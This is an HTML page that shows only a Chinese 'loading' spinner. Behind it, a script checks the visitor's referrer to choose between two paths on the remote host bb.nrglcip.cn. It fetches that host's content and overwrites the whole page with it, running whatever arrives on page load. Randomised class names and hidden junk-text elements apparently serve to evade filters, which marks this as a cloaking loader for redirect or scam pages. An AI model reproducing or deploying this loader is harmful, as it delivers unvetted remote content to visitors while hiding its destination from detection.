<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .n6Ntj7pfV {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .n6Ntj7pfV .YV1X5cjlHfW {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .n6Ntj7pfV .content {
            line-height: 50px;
            text-align: center
        }

        .n6Ntj7pfV .img {
            width: 100%
        }

        .n6Ntj7pfV .fA9dzDGwPne {
            text-align: center
        }

        .n6Ntj7pfV .fA9dzDGwPne span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .n6Ntj7pfV .fA9dzDGwPne span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .n6Ntj7pfV .fA9dzDGwPne span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .n6Ntj7pfV .fA9dzDGwPne span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .n6Ntj7pfV .fA9dzDGwPne span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .n6Ntj7pfV .fA9dzDGwPne span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .n6Ntj7pfV .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function kDMeDMin5CQ(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var hfP7m6 = kDMeDMin5CQ('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ hfP7m6 +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ hfP7m6 +".html?a=share";
		}
		
        EFkw4PI6w=url+"#"+new Date().getTime();
        EFkw4PI6w && function() {
            $.get(EFkw4PI6w, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<ul style='display:none' >n1ERFslBSPaESTLr5ExFg1YHoA4hXrQFv4QjBj6HnZNY92grXBIgsBBcJzt</ul>
<b style='display:none' >cNGbdm23WU6t6VPkH8fPAugt4tpGl0DUDctQFckSxIZFvJIK8ZNYSL16mDdKUc87cuv9MsHzfSJXdrOP7jMM0</b>
<li style='display:none' >SjeiqUyM0stwm13NlZ8Rk8Dga0eXt5TBO9m3V4i</li>
<b style='display:none' >cNGbdm23WU6t6VPkH8fPAugt4tpGl0DUDctQFckSxIZFvJIK8ZNYSL16mDdKUc87cuv9MsHzfSJXdrOP7jMM0</b>
<a  href='#' style='display:none'>ik6sKw5Fxmu8vFTEfd1DbjVdIBmne4mx1T7j5rY01FEljwqbP9oBHIykflTOgGa9ySyAcOn2pLoYbJwmGp6WgAY</a>
<img  src='' style='display:none'>
<ul style='display:none' >n1ERFslBSPaESTLr5ExFg1YHoA4hXrQFv4QjBj6HnZNY92grXBIgsBBcJzt</ul>
<span style='display:none'>FCGVDS1nQqzr23RkCiXKhCZ7gqu7VHCcX9YQ6Wv0kYoah9VbdUcTaFfirT80HJnsuTfrarCWkNshXuN2TJVYCEvYtLuIwyYEnhJ</span><div class="n6Ntj7pfV">
    <div class="YV1X5cjlHfW">
        <div class="fA9dzDGwPne">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<div style='display:none'>iUwCz3J001C738ldwa5oi0TKNMxElISdliClcr91BfboQ2UmhweTJiBWwiewYYn</div>
<p  style='display:none'>xHeaBiyOdraKrz7N4ElEEEupLA5ww69XvR8VJB6p9BxYYXaRnnkp2OvMx9oa8qu4clQcZK9V3YuPyeuuxv0EDFOJG1dsu3PFM</p>
<ul style='display:none' >pZW49GUdrwGBHN2bIUcAxVm3uQW9asNaFiG0tkm7gemcuRWNKWcTRFuCuhw</ul></body>
</html>